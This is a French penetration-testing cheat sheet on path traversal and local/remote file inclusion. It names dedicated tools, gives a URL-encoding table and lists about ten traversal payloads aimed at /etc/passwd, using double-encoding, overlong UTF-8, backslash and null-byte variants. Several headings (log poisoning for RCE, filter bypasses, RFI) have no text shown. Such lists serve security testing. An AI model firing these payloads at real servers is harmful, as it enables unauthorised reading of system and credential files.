📁Path Traversal / LFI / RFI
Outils dédiés aux path traversals et local file inclusion
Liffy
LFISuite
LighTraversal
Manuel
Encoding:
sans simple double
: 3A %253A
/ 2F %252F
. 2E %252E
- 2D %252D
= 3D %253D
Exemples
/etc/passwd
../../../etc/passwd
....//....//....//etc//passwd
..///////..///////..///////etc///////passwd
..%5c..%5c..%5cetc%5cpasswd
.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd
..%253f..%253f..%253fetc%253fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
/var/www/images/../../../etc/passwdNull byte (%00)
Wrapper
RCE via LFI + Log Poisoning
Quelques tips
LFI sur serveur Windows
Chemin relatif a partir du repertoire courant (cwd) du drive C
Nginx
Ruby on rails / Django / NodeJs dans header Accept:
NodeJS filter bypass
RFI
HTTP
FTP
SMB
Trouver des paramètres
Mis à jour